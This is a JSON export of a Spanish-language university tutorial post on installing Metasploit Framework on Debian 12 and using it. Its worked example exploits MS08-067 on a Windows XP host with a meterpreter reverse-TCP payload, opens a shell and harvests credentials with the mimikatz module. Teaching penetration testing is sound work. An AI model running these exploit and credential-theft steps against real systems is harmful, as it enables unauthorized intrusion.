{"id":1272,"date":"2024-12-11T00:45:39","date_gmt":"2024-12-11T00:45:39","guid":{"rendered":"https:\/\/dsantana.uas.edu.mx\/?p=1272"},"modified":"2025-01-16T17:02:18","modified_gmt":"2025-01-16T17:02:18","slug":"metasploit-framework","status":"publish","type":"post","link":"https:\/\/dsantana.uas.edu.mx\/index.php\/2024\/12\/11\/metasploit-framework\/","title":{"rendered":"Metasploit Framework"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\">Manual Completo: Uso de Metasploit Framework<\/h1>\n\n\n\n<p>Metasploit Framework es una herramienta de c\u00f3digo abierto ampliamente utilizada para realizar pruebas de penetraci\u00f3n y actividades relacionadas con la seguridad ofensiva. Este manual detalla desde la instalaci\u00f3n hasta el uso b\u00e1sico y avanzado de la herramienta.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Secci\u00f3n 1: Instalaci\u00f3n de Metasploit Framework en Debian 12<\/strong><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>1.1 Actualizaci\u00f3n del sistema<\/strong><\/h3>\n\n\n\n<p>Ejecuta los siguientes comandos para actualizar los paquetes del sistema:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo apt update &amp;&amp; sudo apt upgrade -y<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>1.2 Instalaci\u00f3n de dependencias necesarias<\/strong><\/h3>\n\n\n\n<p>Metasploit requiere varias bibliotecas y herramientas:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo apt install -y curl gpg gcc g++ make zlib1g-dev libpq-dev libpcap-dev postgresql postgresql-contrib git ruby-full<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>1.3 Configuraci\u00f3n de PostgreSQL<\/strong><\/h3>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Inicia el servicio de PostgreSQL: <code>sudo systemctl start postgresql sudo systemctl enable postgresql<\/code><\/li>\n\n\n\n<li>Configura un usuario y una base de datos: <code>sudo -u postgres createuser msf -P sudo -u postgres createdb msf_database -O msf<\/code><\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>1.4 Descarga e instalaci\u00f3n de Metasploit Framework<\/strong><\/h3>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Clona el repositorio oficial: <code>git clone https:\/\/github.com\/rapid7\/metasploit-framework.git cd metasploit-framework<\/code><\/li>\n\n\n\n<li>Instala Bundler y las dependencias: <code>gem install bundler bundle install<\/code><\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>1.5 Configuraci\u00f3n de la base de datos<\/strong><\/h3>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Copia la configuraci\u00f3n de base de datos predeterminada: <code>cp config\/database.yml.example config\/database.yml<\/code><\/li>\n\n\n\n<li>Edita el archivo <code>config\/database.yml<\/code> para agregar las credenciales de PostgreSQL:<code>production: adapter: postgresql database: msf_database username: msf password: [tu_contrase\u00f1a] host: 127.0.0.1 port: 5432<\/code><\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>1.6 Ejecuci\u00f3n de Metasploit Framework<\/strong><\/h3>\n\n\n\n<p>Inicia Metasploit Framework: .\/msfconsole<\/p>\n\n\n\n<p>Verifica la conexi\u00f3n a la base de datos: db_status<\/p>\n\n\n\n<p>Deber\u00edas ver: [*] Connected to msf_database<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Secci\u00f3n 2: Conceptos B\u00e1sicos de Metasploit<\/strong><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>2.1 Componentes Principales<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Exploit<\/strong>: C\u00f3digo que aprovecha una vulnerabilidad espec\u00edfica.<\/li>\n\n\n\n<li><strong>Payload<\/strong>: C\u00f3digo que se ejecuta despu\u00e9s de explotar la vulnerabilidad.<\/li>\n\n\n\n<li><strong>Auxiliary Modules<\/strong>: Herramientas para escaneo, denegaci\u00f3n de servicio, etc.<\/li>\n\n\n\n<li><strong>Post-Exploitation Modules<\/strong>: Scripts para mantener acceso o extraer datos.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>2.2 Navegaci\u00f3n B\u00e1sica<\/strong><\/h3>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>2.2.1 Comandos esenciales<\/strong><\/h4>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li><strong>Buscar m\u00f3dulos<\/strong>: <code>search [palabra_clave]<\/code>Ejemplo: <code>search smb<\/code><\/li>\n\n\n\n<li><strong>Seleccionar un m\u00f3dulo<\/strong>: <code>use [ruta_del_m\u00f3dulo]<\/code>Ejemplo: <code>use exploit\/windows\/smb\/ms08_067_netapi<\/code><\/li>\n\n\n\n<li><strong>Ver opciones del m\u00f3dulo<\/strong>:<code> show options<\/code><\/li>\n\n\n\n<li><strong>Configurar opciones<\/strong>: <code>set [opci\u00f3n] [valor]<\/code>Ejemplo: <code>set RHOSTS 192.168.1.10<\/code><\/li>\n\n\n\n<li><strong>Ejecutar el m\u00f3dulo<\/strong>: <code>run<\/code><\/li>\n<\/ol>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>2.2.2 Gestionar bases de datos<\/strong><\/h4>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Agregar hosts: <code>db_nmap 192.168.1.0\/24<\/code><\/li>\n\n\n\n<li>Mostrar hosts almacenados:<code> hosts<\/code><\/li>\n<\/ol>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Secci\u00f3n 3: Ejemplo Pr\u00e1ctico &#8211; Exploitar una Vulnerabilidad<\/strong><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>3.1 Escaneo de Red con Nmap<\/strong><\/h3>\n\n\n\n<p>Usa Nmap para identificar dispositivos en la red: nmap -sS -sV 192.168.1.0\/24<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>3.2 Selecci\u00f3n de un Exploit<\/strong><\/h3>\n\n\n\n<p>Supongamos que el escaneo revela un sistema Windows XP vulnerable al SMB: use exploit\/windows\/smb\/ms08_067_netapi<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>3.3 Configuraci\u00f3n del Exploit<\/strong><\/h3>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Establece el objetivo: <code>set RHOSTS 192.168.1.10<\/code><\/li>\n\n\n\n<li>Configura el payload: <code>set PAYLOAD windows\/meterpreter\/reverse_tcp<\/code><\/li>\n\n\n\n<li>Define el host y puerto del atacante: <code>set LHOST 192.168.1.100 set LPORT 4444<\/code><\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>3.4 Ejecuci\u00f3n del Exploit<\/strong><\/h3>\n\n\n\n<p>Ejecuta el exploit: run<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>3.5 Interacci\u00f3n con la Sesi\u00f3n Meterpreter<\/strong><\/h3>\n\n\n\n<p>Una vez que obtengas acceso:<\/p>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Verifica informaci\u00f3n del sistema: <code>sysinfo<\/code><\/li>\n\n\n\n<li>Obt\u00e9n una shell del sistema: <code>shell<\/code><\/li>\n<\/ol>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Secci\u00f3n 4: M\u00f3dulos Auxiliares y Post-Explotaci\u00f3n<\/strong><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>4.1 Escaneo de Puertos con un M\u00f3dulo Auxiliar<\/strong><\/h3>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Usa el m\u00f3dulo de escaneo de puertos: <code>use auxiliary\/scanner\/portscan\/tcp<\/code><\/li>\n\n\n\n<li>Configura las opciones: <code>set RHOSTS 192.168.1.0\/24 set THREADS 10<\/code><\/li>\n\n\n\n<li>Ejecuta el m\u00f3dulo:<code> run<\/code><\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>4.2 Recolectar Contrase\u00f1as<\/strong><\/h3>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Usa un m\u00f3dulo de post-explotaci\u00f3n: <code>use post\/windows\/gather\/credentials\/mimikatz<\/code><\/li>\n\n\n\n<li>Configura la sesi\u00f3n: <code>set SESSION 1<\/code><\/li>\n\n\n\n<li>Ejecuta el m\u00f3dulo: <code>run<\/code><\/li>\n<\/ol>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Secci\u00f3n 5: Consejos de Seguridad y Buenas Pr\u00e1cticas<\/strong><\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Usa Metasploit \u00fanicamente en entornos autorizados.<\/li>\n\n\n\n<li>Documenta cuidadosamente los pasos realizados y los hallazgos.<\/li>\n\n\n\n<li>Aseg\u00farate de no comprometer la privacidad o integridad de sistemas no autorizados.<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Conclusi\u00f3n<\/strong><\/h2>\n\n\n\n<p>Metasploit Framework es una herramienta poderosa que permite realizar pruebas de penetraci\u00f3n y explorar vulnerabilidades de manera profesional. Con una configuraci\u00f3n adecuada y un uso \u00e9tico, puedes identificar y mitigar riesgos en sistemas de manera efectiva. \u00a1Practica responsablemente y sigue aprendiendo!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Manual Completo: Uso de Metasploit Framework Metasploit Framework es una herramienta de c\u00f3digo abierto ampliamente utilizada para realizar pruebas de penetraci\u00f3n y actividades relacionadas con la seguridad ofensiva. Este manual detalla desde la instalaci\u00f3n hasta el uso b\u00e1sico y avanzado de la herramienta. Secci\u00f3n 1: Instalaci\u00f3n de Metasploit Framework en Debian 12 1.1 Actualizaci\u00f3n del sistema Ejecuta los siguientes comandos para actualizar los paquetes del sistema: 1.2 Instalaci\u00f3n de dependencias necesarias Metasploit requiere varias bibliotecas y herramientas: 1.3 Configuraci\u00f3n de PostgreSQL 1.4 Descarga e instalaci\u00f3n de Metasploit Framework 1.5 Configuraci\u00f3n de la base de datos 1.6 Ejecuci\u00f3n de Metasploit Framework Inicia Metasploit Framework: .\/msfconsole Verifica la conexi\u00f3n a la base de datos: db_status Deber\u00edas ver: [*] Connected to msf_database Secci\u00f3n 2: Conceptos B\u00e1sicos de Metasploit 2.1 Componentes Principales 2.2 Navegaci\u00f3n B\u00e1sica 2.2.1 Comandos esenciales 2.2.2 Gestionar bases de datos Secci\u00f3n 3: Ejemplo Pr\u00e1ctico &#8211; Exploitar una Vulnerabilidad 3.1 Escaneo de Red con Nmap Usa Nmap para identificar dispositivos en la red: nmap -sS -sV 192.168.1.0\/24 3.2 Selecci\u00f3n de un Exploit Supongamos que el escaneo revela un sistema Windows XP vulnerable al SMB: use exploit\/windows\/smb\/ms08_067_netapi 3.3 Configuraci\u00f3n del Exploit 3.4 Ejecuci\u00f3n del Exploit Ejecuta el exploit: run 3.5 Interacci\u00f3n con la Sesi\u00f3n Meterpreter Una vez que obtengas acceso: Secci\u00f3n 4: M\u00f3dulos Auxiliares y Post-Explotaci\u00f3n 4.1 Escaneo de Puertos con un M\u00f3dulo Auxiliar 4.2 Recolectar Contrase\u00f1as Secci\u00f3n 5: Consejos de Seguridad y Buenas Pr\u00e1cticas Conclusi\u00f3n Metasploit Framework es una herramienta poderosa que permite realizar pruebas de penetraci\u00f3n y explorar vulnerabilidades de manera profesional. Con una configuraci\u00f3n adecuada y un uso \u00e9tico, puedes identificar y mitigar riesgos en sistemas de manera efectiva. \u00a1Practica responsablemente y sigue aprendiendo!<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,87,1,6,88],"tags":[],"class_list":["post-1272","post","type-post","status-publish","format-standard","hentry","category-docencia","category-seguridad-talleres","category-sin-categoria","category-talleres","category-test-de-penetracion"],"_links":{"self":[{"href":"https:\/\/dsantana.uas.edu.mx\/index.php\/wp-json\/wp\/v2\/posts\/1272","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dsantana.uas.edu.mx\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dsantana.uas.edu.mx\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dsantana.uas.edu.mx\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dsantana.uas.edu.mx\/index.php\/wp-json\/wp\/v2\/comments?post=1272"}],"version-history":[{"count":5,"href":"https:\/\/dsantana.uas.edu.mx\/index.php\/wp-json\/wp\/v2\/posts\/1272\/revisions"}],"predecessor-version":[{"id":1281,"href":"https:\/\/dsantana.uas.edu.mx\/index.php\/wp-json\/wp\/v2\/posts\/1272\/revisions\/1281"}],"wp:attachment":[{"href":"https:\/\/dsantana.uas.edu.mx\/index.php\/wp-json\/wp\/v2\/media?parent=1272"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dsantana.uas.edu.mx\/index.php\/wp-json\/wp\/v2\/categories?post=1272"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dsantana.uas.edu.mx\/index.php\/wp-json\/wp\/v2\/tags?post=1272"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}